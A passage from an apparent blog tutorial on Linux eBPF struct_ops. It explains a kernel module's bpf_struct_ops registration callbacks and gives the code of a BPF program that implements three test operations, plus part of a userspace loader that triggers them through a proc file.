    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;owner&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;THIS_MODULE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure is filled with callbacks that the kernel will use to manage our &lt;code&gt;struct_ops&lt;/code&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;.reg&lt;/code&gt; and &lt;code&gt;.unreg&lt;/code&gt;: These are registration and unregistration callbacks. The kernel invokes &lt;code&gt;.reg&lt;/code&gt; when a BPF program tries to attach an implementation for &lt;code&gt;bpf_testmod_ops&lt;/code&gt;. Our implementation uses &lt;code&gt;cmpxchg&lt;/code&gt; to ensure only one BPF program can be attached at a time. &lt;code&gt;.unreg&lt;/code&gt; is called when the BPF program is detached.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.verifier_ops&lt;/code&gt;: This points to a structure of callbacks for the BPF verifier. It allows us to customize how the verifier treats BPF programs attached to this &lt;code&gt;struct_ops&lt;/code&gt;. For example, we can control which helper functions are allowed. In our case, we use &lt;code&gt;bpf_base_func_proto&lt;/code&gt; to allow a basic set of helpers, including &lt;code&gt;bpf_printk&lt;/code&gt;, which is useful for debugging.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.init&lt;/code&gt; and &lt;code&gt;.init_member&lt;/code&gt;: These are for BTF (BPF Type Format) initialization. They are required for the kernel to understand the types and layout of our &lt;code&gt;struct_ops&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;.name&lt;/code&gt; and &lt;code&gt;.owner&lt;/code&gt;: These identify our &lt;code&gt;struct_ops&lt;/code&gt; and tie it to our module, ensuring proper reference counting so the module isn't unloaded while a BPF program is still attached.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The module's &lt;code&gt;testmod_init&lt;/code&gt; function is where the magic starts. It calls &lt;code&gt;register_bpf_struct_ops&lt;/code&gt;, passing our definition. This makes the kernel aware of the new &lt;code&gt;bpf_testmod_ops&lt;/code&gt; type, and from this point on, BPF programs can target it.&lt;/p&gt;

&lt;p&gt;Finally, to make this demonstrable, the module creates a file in the proc filesystem: &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt;. When a userspace program writes to this file, the &lt;code&gt;trigger_write&lt;/code&gt; function is called. This function checks if a BPF program has registered an implementation for &lt;code&gt;testmod_ops&lt;/code&gt;. If so, it calls the function pointers (&lt;code&gt;test_1&lt;/code&gt;, &lt;code&gt;test_2&lt;/code&gt;, &lt;code&gt;test_3&lt;/code&gt;), which will execute the code in our BPF program. This provides a simple way to invoke the BPF-implemented operations from userspace. The use of RCU (&lt;code&gt;rcu_read_lock&lt;/code&gt;, &lt;code&gt;rcu_dereference&lt;/code&gt;) ensures that we can safely access the &lt;code&gt;testmod_ops&lt;/code&gt; pointer even if it's being updated concurrently.&lt;/p&gt;

&lt;h2&gt;
  
  
  The BPF Program: Implementing the Operations
&lt;/h2&gt;

&lt;p&gt;With the kernel module in place defining the &lt;em&gt;what&lt;/em&gt; (the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; interface), we can now write a BPF program to define the &lt;em&gt;how&lt;/em&gt; (the actual implementation of those operations). This BPF program will contain the logic that executes when the &lt;code&gt;test_1&lt;/code&gt;, &lt;code&gt;test_2&lt;/code&gt;, and &lt;code&gt;test_3&lt;/code&gt; functions are called from the kernel.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: &lt;code&gt;struct_ops.bpf.c&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This program provides the concrete implementations for the function pointers in &lt;code&gt;bpf_testmod_ops&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cm"&gt;/* SPDX-License-Identifier: GPL-2.0 */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"module/bpf_testmod.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cm"&gt;/* Implement the struct_ops callbacks */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_1"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_1 called!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;42&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_2"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_2 called: %d + %d = %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"struct_ops/test_3"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;BPF_PROG&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;64&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"BPF test_3 called with buffer length %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="cm"&gt;/* Safely read from kernel buffer using bpf_probe_read_kernel */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_probe_read_kernel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="cm"&gt;/* Successfully read buffer - print first few characters */&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Buffer content: '%c%c%c%c'&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Full buffer: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Failed to read buffer, ret=%ld&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Define the struct_ops map */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".struct_ops"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The BPF code is remarkably straightforward, which is a testament to the power of the &lt;code&gt;struct_ops&lt;/code&gt; abstraction.&lt;/p&gt;

&lt;p&gt;Each function in the BPF program corresponds to one of the operations defined in the kernel module's &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct. The magic lies in the &lt;code&gt;SEC&lt;/code&gt; annotations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;SEC("struct_ops/test_1")&lt;/code&gt;: This tells the BPF loader that the &lt;code&gt;bpf_testmod_test_1&lt;/code&gt; program is an implementation for a &lt;code&gt;struct_ops&lt;/code&gt; operation. The name after the slash isn't strictly enforced to match the function name, but it's a good convention. The key part is the &lt;code&gt;struct_ops&lt;/code&gt; prefix.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The implementations themselves are simple:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_1&lt;/code&gt;: This function takes no arguments, prints a message to the kernel trace log using &lt;code&gt;bpf_printk&lt;/code&gt;, and returns the integer &lt;code&gt;42&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_2&lt;/code&gt;: This function takes two integers, &lt;code&gt;a&lt;/code&gt; and &lt;code&gt;b&lt;/code&gt;, calculates their sum, prints the operation and result, and returns the sum.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;bpf_testmod_test_3&lt;/code&gt;: This function demonstrates handling data from userspace. It receives a character buffer and its length. It uses &lt;code&gt;bpf_probe_read_kernel&lt;/code&gt; to safely copy the data from the buffer passed by the kernel module into a local buffer on the BPF stack. This is a crucial safety measure, as BPF programs cannot directly access arbitrary kernel memory pointers. After reading, it prints the content.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The final piece is the &lt;code&gt;struct_ops&lt;/code&gt; map itself:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".struct_ops"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops&lt;/span&gt; &lt;span class="n"&gt;testmod_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;test_3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_test_3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the most critical part for linking everything together.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;SEC(".struct_ops")&lt;/code&gt;: This special section identifies the following data structure as a &lt;code&gt;struct_ops&lt;/code&gt; map.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;struct bpf_testmod_ops testmod_ops&lt;/code&gt;: We declare a variable named &lt;code&gt;testmod_ops&lt;/code&gt; of the type &lt;code&gt;struct bpf_testmod_ops&lt;/code&gt;. The &lt;strong&gt;name of this variable is important&lt;/strong&gt;. It must match the &lt;code&gt;name&lt;/code&gt; field in the &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition within the kernel module (&lt;code&gt;.name = "bpf_testmod_ops"&lt;/code&gt;). This is how &lt;code&gt;libbpf&lt;/code&gt; knows which kernel &lt;code&gt;struct_ops&lt;/code&gt; this BPF program intends to implement.&lt;/li&gt;
&lt;li&gt;The structure is initialized by assigning the BPF programs (&lt;code&gt;bpf_testmod_test_1&lt;/code&gt;, etc.) to the corresponding function pointers. This maps our BPF functions to the "slots" in the &lt;code&gt;struct_ops&lt;/code&gt; interface.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the userspace loader attaches this &lt;code&gt;struct_ops&lt;/code&gt;, &lt;code&gt;libbpf&lt;/code&gt; and the kernel work together to find the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; registered by our kernel module and link these BPF programs as its implementation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Userspace Loader: Attaching and Triggering
&lt;/h2&gt;

&lt;p&gt;The final component is the userspace program. Its job is to load the BPF program, attach it to the &lt;code&gt;struct_ops&lt;/code&gt; defined by the kernel module, and then trigger the operations to demonstrate that everything is working.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete Userspace Program: &lt;code&gt;struct_ops.c&lt;/code&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;signal.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;fcntl.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"struct_ops.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;volatile&lt;/span&gt; &lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;handle_signal&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sig&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;exiting&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;trigger_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"/proc/bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;O_WRONLY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"open /proc/bpf_testmod_trigger"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;strlen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;message&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;perror&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"write"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;close&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

